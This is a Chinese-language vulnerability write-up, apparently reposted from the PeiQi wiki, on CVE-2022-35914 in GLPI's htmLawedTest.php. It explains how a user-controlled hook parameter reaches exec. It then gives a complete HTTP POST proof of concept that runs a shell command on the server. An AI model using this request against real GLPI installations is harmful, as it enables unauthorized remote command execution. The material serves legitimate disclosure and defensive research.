GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

渗透技巧 2年前 (2022) admin
1,320 0 0
GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914
GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

漏洞描述

GLPI是一个用于IT资产管理的开源软件,用PHP编写,并在GPL许可下发布。 作为一种开源技术,任何人都可以运行,修改或开发代码。GLPI 10.0.2及之前版本存在安全漏洞,该漏洞源于PHP htmlawed 模块中 允许 PHP 代码注入

漏洞影响

GLPI

漏洞复现

登录页面

GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

出现问题的文件为 htmLawedTest.php, 来源于第三方库 PHP Labware

GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914
https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/

htmLawedTest.php 中接收参数并传入方法 htmLawed

GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

跟进文件 htmLawed.phpGLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

if($C['hook']){$t = $C['hook']($t, $C, $S);}

这里可以看到参数均为用户可控参数,当控制参数 hhookexectext 为执行的命令时就导致了命令执行漏洞

GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

验证POC

/vendor/htmlawed/htmlawed/htmLawedTest.php
GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914
GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

访问页面获取到 sid 与 token 后再发送请求包

POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 88
Content-Type: application/x-www-form-urlencoded

token=a79cf121bde57fe0e3cc0f247f77961a&text=id&hhook=exec&sid=h1c0vk004dvulal5nj8i6en44e
GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

关注公众号

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号
想要加入交流群的师傅公众号点击交流群找WgpsecBot机器人拉你啦~

支持作者

GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

关于文库

在线文库: http://wiki.peiqi.tech
Github: https://github.com/PeiQi0/PeiQi-WIKI-Book 
GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

文库动态

GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914


原文始发于微信公众号(PeiQi文库):GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914

版权声明:admin 发表于 2022年10月5日 下午1:23。
转载请注明:GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...